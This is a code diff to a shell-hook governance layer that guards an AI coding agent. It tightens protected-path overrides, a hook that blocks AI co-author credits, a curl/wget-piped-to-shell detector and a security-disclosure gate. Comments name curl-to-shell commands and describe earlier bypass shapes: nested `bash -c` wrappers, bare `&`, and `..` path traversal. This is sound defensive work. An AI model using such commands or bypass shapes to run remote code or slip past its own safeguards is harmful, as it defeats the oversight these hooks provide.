     fi
   done < "$policy"
 }
+
+# Emit each entry of an inline-array body (everything between `[` and
+# `]`, possibly across newlines if the caller concatenated lines with
+# spaces). Strips outer brackets, splits on `,`, trims whitespace and
+# matched outer quotes, drops empty entries (trailing-comma tolerance).
+_policy_emit_inline_array() {
+  local buf="$1"
+  # Drop the closing `]` and anything after it (line comments etc).
+  buf=$(printf '%s' "$buf" | sed -E 's/\].*$//')
+  # Split on commas.
+  local IFS=','
+  local raw
+  for raw in $buf; do
+    # Trim leading + trailing whitespace.
+    raw="${raw#"${raw%%[![:space:]]*}"}"
+    raw="${raw%"${raw##*[![:space:]]}"}"
+    # Drop trailing inline comment (` # comment`).
+    raw=$(printf '%s' "$raw" | sed -E 's/[[:space:]]+#.*$//')
+    # Re-trim after comment stripping.
+    raw="${raw#"${raw%%[![:space:]]*}"}"
+    raw="${raw%"${raw##*[![:space:]]}"}"
+    # Skip empty entries (trailing comma, blank line in multi-line form).
+    [[ -z "$raw" ]] && continue
+    # Strip matched outer single or double quotes.
+    raw=$(printf '%s' "$raw" | sed -E "s/^[\"']//; s/[\"']$//")
+    printf '%s\n' "$raw"
+  done
+}

package/hooks/_lib/protected-paths.sh

@@ -58,6 +58,13 @@ REA_KILL_SWITCH_INVARIANTS=(
 # first call to `rea_path_is_protected`; stays the same for the lifetime
 # of the hook process.
 REA_PROTECTED_PATTERNS=()
+# 0.18.0 helix-020 G2 fix: track which patterns came from the consumer's
+# explicit `protected_writes` override (vs. the hardcoded default). The
+# override-first ordering in `rea_path_is_protected` checks ONLY this
+# subset before consulting the extension-surface allow-list, so an
+# explicit `protected_writes: [.husky/pre-push.d/]` can re-protect a
+# path that the allow-list would otherwise let through.
+REA_PROTECTED_OVERRIDE_PATTERNS=()
 _REA_PROTECTED_PATTERNS_LOADED=0
 
 # True if $1 is a kill-switch invariant (case-insensitive exact or
@@ -75,8 +82,16 @@ _rea_is_kill_switch() {
   return 1
 }
 
-# Load the effective list, applying `protected_paths_relax` from policy.
+# Load the effective list, applying `protected_writes` (full override
+# from policy) and `protected_paths_relax` (subtractor) from policy.
 # Sources policy-read.sh on demand so this lib stays self-contained.
+#
+# 0.17.0 helix-018 Option A: `protected_writes` lets consumers fully
+# define the protected list. When set, replaces the hardcoded default;
+# kill-switch invariants are always added back regardless. When unset,
+# defaults to REA_PROTECTED_PATTERNS_FULL (the historical 5 patterns).
+# `protected_paths_relax` then subtracts from whatever the effective
+# set is (kill-switch invariants are non-relaxable).
 _rea_load_protected_patterns() {
   if [ "$_REA_PROTECTED_PATTERNS_LOADED" = "1" ]; then
     return 0
@@ -89,14 +104,71 @@ _rea_load_protected_patterns() {
     source "${BASH_SOURCE[0]%/*}/policy-read.sh" 2>/dev/null || true
   fi
 
+  # Read both policy keys.
+  local writes_list=()
   local relax_list=()
+  local protected_writes_set=0
   if command -v policy_list >/dev/null 2>&1; then
+    # `protected_writes`: detect "set but empty" vs "unset" via a probe.
+    # policy_list returns nothing for both cases, so we use a sentinel
+    # check on the YAML key existence via a separate probe.
+    local pw_present
+    pw_present=$(policy_scalar "protected_writes" 2>/dev/null || true)
+    # If the key is a list (yq returns "null" or empty for scalar reads
+    # of a list), policy_list reads it. We detect "key exists" by
+    # checking either policy_scalar's return OR policy_list's output.
+    while IFS= read -r entry; do
+      [ -z "$entry" ] && continue
+      writes_list+=("$entry")
+      protected_writes_set=1
+    done < <(policy_list "protected_writes" 2>/dev/null || true)
+    # If pw_present is "[]" (empty array) — policy_list returns nothing
+    # but the key IS set. policy_scalar of a list returns "null" or
+    # the literal `[]`. Treat any of those as "set".
+    case "$pw_present" in
+      '[]'|'null') protected_writes_set=1 ;;
+    esac
+
     while IFS= read -r entry; do
       [ -z "$entry" ] && continue
       relax_list+=("$entry")
     done < <(policy_list "protected_paths_relax" 2>/dev/null || true)
   fi
 
+  # Compose the BASE list:
+  #   - If `protected_writes` set in policy: that list, plus kill-switch
+  #     invariants always added (deduped).
+  #   - Else: REA_PROTECTED_PATTERNS_FULL (hardcoded historical default).
+  local base_list=()
+  if [ "$protected_writes_set" = "1" ]; then
+    local w
+    for w in "${writes_list[@]+"${writes_list[@]}"}"; do
+      base_list+=("$w")
+    done
+    # Add kill-switch invariants if not already present.
+    local inv inv_lc found
+    for inv in "${REA_KILL_SWITCH_INVARIANTS[@]}"; do
+      inv_lc=$(printf '%s' "$inv" | tr '[:upper:]' '[:lower:]')
+      found=0
+      local b b_lc
+      for b in "${base_list[@]+"${base_list[@]}"}"; do
+        b_lc=$(printf '%s' "$b" | tr '[:upper:]' '[:lower:]')
+        if [[ "$b_lc" == "$inv_lc" ]]; then
+          found=1
+          break
+        fi
+      done
+      if [ "$found" = "0" ]; then
+        base_list+=("$inv")
+      fi
+    done
+  else
+    local pat
+    for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
+      base_list+=("$pat")
+    done
+  fi
+
   # Validate relax entries: any kill-switch invariant in the list is
   # silently dropped from "permitted to relax" but emits a stderr
   # advisory so the operator can see why their relax didn't take
@@ -112,10 +184,10 @@ _rea_load_protected_patterns() {
     fi
   done
 
-  # Build the effective list: every FULL entry that is NOT in the
+  # Build the effective list: every BASE entry that is NOT in the
   # relaxed set (case-insensitive comparison).
   local pat pat_lc rentry rentry_lc relaxed
-  for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
+  for pat in "${base_list[@]+"${base_list[@]}"}"; do
     pat_lc=$(printf '%s' "$pat" | tr '[:upper:]' '[:lower:]')
     relaxed=0
     for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
@@ -130,6 +202,31 @@ _rea_load_protected_patterns() {
     fi
   done
 
+  # 0.18.0 helix-020 G2: also expose the EXPLICIT-OVERRIDE subset so
+  # `rea_path_is_protected` can prioritize override matches over the
+  # extension-surface allow-list. Only entries that came from a
+  # `protected_writes:` declaration land here — kill-switch invariants
+  # added defensively in step 2 above are NOT included (they get the
+  # historical "extension surface relaxes them" treatment, since the
+  # user did NOT explicitly opt in to protecting husky fragments).
+  if [ "$protected_writes_set" = "1" ]; then
+    local ow ow_lc rentry_lc2 relaxed2
+    for ow in "${writes_list[@]+"${writes_list[@]}"}"; do
+      ow_lc=$(printf '%s' "$ow" | tr '[:upper:]' '[:lower:]')
+      relaxed2=0
+      for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
+        rentry_lc2=$(printf '%s' "$rentry" | tr '[:upper:]' '[:lower:]')
+        if [[ "$ow_lc" == "$rentry_lc2" ]]; then
+          relaxed2=1
+          break
+        fi
+      done
+      if [ "$relaxed2" = "0" ]; then
+        REA_PROTECTED_OVERRIDE_PATTERNS+=("$ow")
+      fi
+    done
+  fi
+
   _REA_PROTECTED_PATTERNS_LOADED=1
 }
 
@@ -178,18 +275,57 @@ rea_path_is_extension_surface() {
 #
 # 0.16.4 helix-018 Option B: paths inside the documented husky
 # extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
-# return 1 (not protected) BEFORE the prefix-pattern check so they
-# don't get caught by `.husky/`'s prefix block. This mirrors the
-# §5b allow-list that has been in settings-protection.sh since 0.13.2.
+# return 1 (not protected) by default so they don't get caught by
+# `.husky/`'s prefix block. This mirrors the §5b allow-list that has
+# been in settings-protection.sh since 0.13.2.
+#
+# 0.18.0 helix-020 G2 fix: ORDER MATTERS. The pre-fix function checked
+# the extension-surface allow-list FIRST and short-circuited "not
+# protected" unconditionally. That made the `protected_writes` /
+# `protected_paths` override silently ineffective for any path inside
+# the extension surface — a consumer who wanted `.husky/pre-push.d/`
+# hardened could not opt in. The fix: explicit overrides win FIRST
+# (the consumer asked for this), then the extension-surface
+# short-circuit applies to anything else, then the default protected
+# list. Pseudocode is the canonical version from helix-020 Interactive
+# Finding 1.
 rea_path_is_protected() {
   _rea_load_protected_patterns
-  # Extension-surface allow-list — short-circuit before pattern match.
-  if rea_path_is_extension_surface "$1"; then
-    return 1
-  fi
   local p_lc
   p_lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
   local pattern pattern_lc
+
+  # 1. Explicit `protected_writes` overrides win. If the consumer
+  #    listed this path (or its parent prefix) in `protected_writes`,
+  #    we honor that intent even when the path is on the extension
+  #    surface. This is what lets a consumer harden their managed
+  #    `.husky/pre-push.d/` fragments — the carve-out for unmanaged
+  #    consumer fragments is the default, but it can be undone.
+  for pattern in "${REA_PROTECTED_OVERRIDE_PATTERNS[@]+"${REA_PROTECTED_OVERRIDE_PATTERNS[@]}"}"; do
+    pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
+    if [[ "$p_lc" == "$pattern_lc" ]]; then
+      return 0
+    fi
+    if [[ "$pattern_lc" == */ ]] && [[ "$p_lc" == "$pattern_lc"* ]]; then
+      return 0
+    fi
+  done
+
+  # 2. Extension-surface allow-list. Paths inside the documented
+  #    husky extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
+  #    are NOT protected by default — the consumer manages those
+  #    fragments freely; settings-protection.sh §5b has the same
+  #    carve-out on the Write/Edit side. Step 1 above is what lets a
+  #    consumer override that default per-path.
+  if rea_path_is_extension_surface "$1"; then
+    return 1
+  fi
+
+  # 3. Default protected list (kill-switch invariants + `.husky/`
+  #    prefix block + `.claude/settings*` + `.rea/policy.yaml`). When
+  #    `protected_writes` was set, kill-switch invariants are still
+  #    enforced via this branch because they were added back into
+  #    REA_PROTECTED_PATTERNS during `_rea_load_protected_patterns`.
   for pattern in "${REA_PROTECTED_PATTERNS[@]+"${REA_PROTECTED_PATTERNS[@]}"}"; do
     pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
     if [[ "$p_lc" == "$pattern_lc" ]]; then

package/hooks/attribution-advisory.sh

@@ -58,13 +58,24 @@ fi
 source "$(dirname "$0")/_lib/cmd-segments.sh"
 
 # ── 6. Check if this is a relevant command ────────────────────────────────────
+# 0.18.0 helix-020 / discord-ops Round 10 #2 fix (G4.A): use
+# `any_segment_starts_with`, not `any_segment_matches`. The pre-fix
+# matcher used the unanchored form, so a segment like
+#   gh pr edit --body "tracked: gh pr create earlier in the run"
+# triggered IS_RELEVANT=1 because the substring `gh pr create` was
+# anywhere in the segment. The downstream attribution check then
+# scanned the body for the markdown-link / Co-Authored-By patterns,
+# and ANY mention of those terms in the body's prose got blocked
+# even though the actual command was a `gh pr edit` whose intent had
+# nothing to do with structural attribution. The same anchoring fix
+# `dangerous-bash-interceptor.sh` got in 0.16.3 F5 finally lands here.
 IS_RELEVANT=0
 
-if any_segment_matches "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
+if any_segment_starts_with "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
   IS_RELEVANT=1
 fi
 
-if any_segment_matches "$CMD" 'git[[:space:]]+commit'; then
+if any_segment_starts_with "$CMD" 'git[[:space:]]+commit'; then
   IS_RELEVANT=1
 fi
 
@@ -77,7 +88,21 @@ fi
 FOUND=0
 
 # Co-Authored-By with noreply@ email
-if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@'; then
+# 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B): exclude
+# GitHub's legitimate `<user>@users.noreply.github.com` collaborator
+# footers from the noreply match. Pre-fix the regex `Co-Authored-By:.*noreply@`
+# matched both AI-tool noreply addresses (anthropic.com, openai.com,
+# github-copilot, etc.) AND GitHub's per-user noreply form, blocking
+# legitimate human collaborator credits. The new regex requires
+# `noreply@` to be followed by something that ISN'T `users.noreply.github.com`
+# — covered via a negative-lookahead simulation: match `noreply@` then
+# either end-of-line, whitespace, `>`, or a domain that does NOT begin
+# with `users.noreply.github.com`. Posix ERE has no lookarounds, so we
+# enumerate the allowed-prefix shapes explicitly. The "AI names" branch
+# below catches Co-Authored-By with named tools regardless of the email
+# domain, so dropping `users.noreply.github.com` from the noreply
+# pattern only relaxes the check for human collaborators — never for AI.
+if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)'; then
   FOUND=1
 fi
 

package/hooks/dangerous-bash-interceptor.sh

@@ -257,8 +257,21 @@ fi
 # in-quote pipes are replaced with a sentinel that the regex doesn't
 # match. Real curl-pipe-shell still matches because the pipe between
 # `curl https://x` and `sh` is outside any quote span.
-H12_MASKED=$(quote_masked_cmd "$CMD")
-if printf '%s' "$H12_MASKED" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
+# 0.17.0 helix-017 #1 fix: also scan inner payloads of nested-shell
+# wrappers (`zsh -c "curl https://x | sh"`). The unwrap helper emits
+# the original command + each inner payload as separate lines; we
+# quote-mask each line independently and grep. If ANY emitted line
+# contains a real curl-pipe-shell, fire H12.
+H12_HIT=0
+while IFS= read -r _h12_line; do
+  [ -z "$_h12_line" ] && continue
+  _h12_masked=$(quote_masked_cmd "$_h12_line")
+  if printf '%s' "$_h12_masked" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
+    H12_HIT=1
+    break
+  fi
+done < <(_rea_unwrap_nested_shells "$CMD")
+if [ "$H12_HIT" = "1" ]; then
   add_high \
     "curl/wget piped to shell — remote code execution" \
     "Executing remote scripts without inspection is a major supply chain risk." \

package/hooks/dependency-audit-gate.sh

@@ -58,14 +58,27 @@ extract_packages() {
   # outer command — but they're never the FIRST token on a segment, so
   # the anchor rejects them.
 
-  # Tokenize on shell separators. Each `IFS=` entry becomes a separate
-  # segment we can anchor against. We use bash's `mapfile` with a sed
-  # to inject newlines at separators; awk-based splitting handles the
-  # quoting heuristic well enough for the realistic cases (agent-issued
-  # commands rarely have separators inside single-quoted strings that
-  # would confuse this).
+  # 0.17.0 helix-017 #3: unwrap nested-shell wrappers (`bash -c 'PAYLOAD'`,
+  # `sh -lc "PAYLOAD"`, etc.) before splitting so the inner install
+  # command becomes a segment that anchors against the install-pattern
+  # check below. Pre-fix `bash -lc 'npm install pkg'` produced a single
+  # segment whose first token was `bash` — install-detection skipped.
+  # 0.17.0 helix-019 #3: delegate splitting to the shared
+  # `_rea_split_segments` so this gate inherits the full separator set
+  # (including bare `&` background-process operator added in 0.16.1)
+  # and the quote-mask that prevents over-fire from in-quote separators.
+  # Pre-fix the local segmenter splat on `|||&&|;|` only, missing bare
+  # `&` — `echo warmup & pnpm add lodash` stayed merged into one segment
+  # and the install-pattern leading-token check skipped it entirely.
   local segments
-  segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\|)/\n/g')
+  if [ -f "$(dirname "$0")/_lib/cmd-segments.sh" ]; then
+    # shellcheck source=_lib/cmd-segments.sh
+    source "$(dirname "$0")/_lib/cmd-segments.sh"
+    segments=$(_rea_split_segments "$cmd")
+  else
+    # Fallback (lib unavailable): legacy local splitter preserved.
+    segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\||\&)/\n/g')
+  fi
 
   while IFS= read -r segment; do
     # Trim leading whitespace.

package/hooks/security-disclosure-gate.sh

@@ -118,37 +118,104 @@ REA_ROOT="${CLAUDE_PROJECT_DIR:-$(pwd)}"
 BODY_FILE_TEXT=""
 _extract_body_file_paths() {
   # Emit each `--body-file PATH` and `-F PATH` argument on its own line.
-  # Skips the stdin form (`-`) and `-F=foo`/`--body-file=foo` (handled
-  # by a separate awk pass below).
+  # Skips the stdin form (`-`) and emits the path verbatim from the
+  # equals-form (`--body-file=PATH` / `-F=PATH`).
+  #
+  # 0.17.0 helix-019 #2: quote-aware tokenization. The pre-fix awk split
+  # on whitespace, breaking `--body-file "security notes.md"` into three
+  # tokens — the hook then tried to read `"security` (with literal
+  # leading quote), failed, and silently skipped the body scan. Now we
+  # walk the string with quote-state awareness: whitespace inside
+  # matched `"..."` / `'...'` spans is part of the token, not a
+  # separator. Single-quote spans have no escape semantics; double-quote
+  # spans treat `\"` and `\\` as literal escapes (POSIX shell rules).
   printf '%s' "$COMMAND" \
     | awk '
-        BEGIN { skip_next = 0; flag_was = "" }
+        BEGIN { skip_next = 0 }
+        function strip_outer_quotes(s,    n, first, last) {
+          n = length(s)
+          if (n < 2) return s
+          first = substr(s, 1, 1)
+          last  = substr(s, n, 1)
+          if ((first == "\"" && last == "\"") || (first == "'\''" && last == "'\''")) {
+            return substr(s, 2, n - 2)
+          }
+          return s
+        }
+        function emit_token(t) {
+          if (skip_next) {
+            skip_next = 0
+            if (t == "-" || t == "") return
+            t = strip_outer_quotes(t)
+            print t
+            return
+          }
+          if (t == "--body-file" || t == "-F") { skip_next = 1; return }
+          if (t ~ /^--body-file=/) {
+            v = substr(t, length("--body-file=") + 1)
+            v = strip_outer_quotes(v)
+            if (v != "" && v != "-") print v
+          }
+          if (t ~ /^-F=/) {
+            v = substr(t, length("-F=") + 1)
+            v = strip_outer_quotes(v)
+            if (v != "" && v != "-") print v
+          }
+        }
         {
-          n = split($0, toks, /[[:space:]]+/)
-          for (i = 1; i <= n; i++) {
-            t = toks[i]
-            if (skip_next) {
-              skip_next = 0
-              if (t == "-" || t == "") continue
-              # Strip surrounding quotes from the token if present.
-              gsub(/^["'"'"']/, "", t)
-              gsub(/["'"'"']$/, "", t)
-              print t
+          line = $0
+          n = length(line)
+          i = 1
+          tok = ""
+          mode = 0  # 0=plain, 1=double-quoted, 2=single-quoted
+          while (i <= n) {
+            ch = substr(line, i, 1)
+            if (mode == 0) {
+              # 0.18.0 helix-020 G3.B fix: in plain (unquoted) mode,
+              # `\X` (any character X) is the POSIX shell escape for
+              # the literal character X — most commonly a space in
+              # paths like `path\ with\ spaces.md`. Pre-fix the
+              # tokenizer treated the `\` as an ordinary character and
+              # truncated at the following space, dropping the rest of
+              # the path. We now consume the backslash and emit the
+              # following byte as a literal part of the current token.
+              # `\<eol>` (line-continuation) is left intact — emit the
+              # `\` and let the splitter flow into the next record on
+              # the assumption that the caller already joined the line.
+              if (ch == "\\" && i < n) {
+                nxt = substr(line, i + 1, 1)
+                tok = tok nxt
+                i += 2
+                continue
+              }
+              if (ch == " " || ch == "\t") {
+                if (tok != "") { emit_token(tok); tok = "" }
+                i++; continue
+              }
+              if (ch == "\"") { mode = 1; tok = tok ch; i++; continue }
+              if (ch == "'\''") { mode = 2; tok = tok ch; i++; continue }
+              tok = tok ch
+              i++
               continue
             }
-            if (t == "--body-file" || t == "-F") { skip_next = 1; continue }
-            # Equals form.
-            if (t ~ /^--body-file=/) {
-              v = substr(t, length("--body-file=") + 1)
-              gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
-              if (v != "" && v != "-") print v
-            }
-            if (t ~ /^-F=/) {
-              v = substr(t, length("-F=") + 1)
-              gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
-              if (v != "" && v != "-") print v
+            if (mode == 1) {
+              if (ch == "\\" && i < n) {
+                nxt = substr(line, i + 1, 1)
+                tok = tok ch nxt
+                i += 2
+                continue
+              }
+              if (ch == "\"") { mode = 0; tok = tok ch; i++; continue }
+              tok = tok ch
+              i++
+              continue
             }
+            # mode == 2
+            if (ch == "'\''") { mode = 0; tok = tok ch; i++; continue }
+            tok = tok ch
+            i++
           }
+          if (tok != "") emit_token(tok)
         }'
 }
 while IFS= read -r body_path; do
@@ -180,12 +247,24 @@ while IFS= read -r body_path; do
       esac
     done
     resolved="/$(IFS=/; printf '%s' "${_bf_parts[*]}")"
-    # If the raw path used `..` AND the resolved form escapes REA_ROOT,
-    # refuse — that's the obfuscation shape we care about. A file under
-    # /tmp or /var/folders without `..` segments is fine.
+    # 0.17.0 helix-019 #1: HARD REFUSAL on traversal escaping REA_ROOT.
+    # Pre-fix the gate logged "skipping body scan" and exited 0 — every
+    # sensitive payload at the resolved external path bypassed the
+    # disclosure check. The traversal-out-of-root shape exists ONLY to
+    # obfuscate; legitimate workflows pass absolute tmpfile paths
+    # (`/tmp/...`, `/var/folders/...`) without `..` segments.
     if [[ "$resolved" != "$REA_ROOT" && "$resolved" != "$REA_ROOT"/* ]]; then
-      printf 'security-disclosure-gate: --body-file path uses `..` traversal escaping project root; skipping body scan\n' >&2
-      continue
+      {
+        printf 'SECURITY DISCLOSURE GATE: --body-file path traversal escapes project root\n'
+        printf '\n'
+        printf '  Path:     %s\n' "$raw_path"
+        printf '  Resolved: %s\n' "$resolved"
+        printf '\n'
+        printf '  Rule: --body-file paths whose canonical form uses `..` segments to\n'
+        printf '        escape REA_ROOT are refused. Move the file inside the project\n'
+        printf '        tree, or paste the body inline via --body.\n'
+      } >&2
+      exit 2
     fi
   fi
   if [[ ! -r "$resolved" ]]; then

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@bookedsolid/rea",
-  "version": "0.16.4",
+  "version": "0.18.0",
   "description": "Agentic governance layer for Claude Code — policy enforcement, hook-based safety gates, audit logging, and Codex-integrated adversarial review for AI-assisted projects",
   "license": "MIT",
   "author": "Booked Solid Technology <oss@bookedsolid.tech> (https://bookedsolid.tech)",